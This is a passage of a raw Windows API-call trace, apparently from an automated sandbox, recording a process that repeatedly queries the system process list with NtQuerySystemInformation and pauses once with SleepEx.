NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0186.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14048) returned 0x0 [0187.088] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0189.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14088) returned 0x0 [0202.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, 